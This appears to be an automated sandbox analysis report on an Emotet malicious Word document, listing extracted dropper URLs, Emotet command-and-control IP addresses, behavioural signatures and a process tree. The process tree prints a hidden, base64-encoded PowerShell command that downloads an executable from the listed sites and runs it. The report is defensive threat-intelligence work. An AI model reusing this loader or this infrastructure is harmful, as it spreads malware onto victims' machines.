Analysis

  • max time kernel
    128s
  • resource
    win7v191014
  • submitted
    17-12-2019 13:57

General

  • Target

    Docs_fbff465d66a0eb834b052719a27f5ab1.8

  • Sample

    191217-kcq4xxbp9e

  • SHA256

    6568a3a8206a6474f34f2f1d7a2951653070f60517ef2fb92c47d005bc4f7fbe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/

exe.dropper

http://jsd-id.com/wp-content/uploads/4ae3ep99933/

exe.dropper

http://18teens.xyz/wp-content/epewe862/

exe.dropper

http://www.fundzit.com/wp-admin/g05/

exe.dropper

http://wp.banyannaples.com/cgi-bin/97sq9667/

Extracted

Family

emotet

C2

152.170.108.99:443

99.252.27.6:80

93.148.252.90:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

80.85.87.122:8080

2.139.158.136:443

80.11.158.65:8080

79.31.85.103:80

77.55.211.77:8080

96.61.113.203:80

181.198.203.45:443

142.93.114.137:8080

186.15.83.52:8080

181.36.42.205:443

68.183.190.199:8080

159.203.204.126:8080

50.28.51.143:8080

46.101.212.195:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies registry class 144 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.8.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    PID:1064
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000618;0000000000000664;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2000
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000618;0000000000000664;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1364
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1400
    • C:\Users\Admin\67.exe
      "C:\Users\Admin\67.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\67.exe
        --4e61eeeb
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2196
  • C:\Windows\SysWOW64\sensortexas.exe
    "C:\Windows\SysWOW64\sensortexas.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Windows\SysWOW64\sensortexas.exe
      --aa44eb55
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      PID:2328

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1064-7-0x000000000616F000-0x0000000006173000-memory.dmp

    Filesize

    16KB

  • memory/1064-0-0x0000000005F50000-0x0000000005F54000-memory.dmp

    Filesize

    16KB

  • memory/1064-2-0x0000000009520000-0x0000000009524000-memory.dmp

    Filesize

    16KB

  • memory/1064-1-0x000000000616F000-0x0000000006173000-memory.dmp

    Filesize

    16KB

  • memory/2172-11-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/2196-14-0x0000000000320000-0x0000000000337000-memory.dmp

    Filesize

    92KB

  • memory/2196-15-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/2312-17-0x0000000000350000-0x0000000000367000-memory.dmp

    Filesize

    92KB

  • memory/2328-19-0x00000000003B0000-0x00000000003C7000-memory.dmp

    Filesize

    92KB

  • memory/2328-20-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB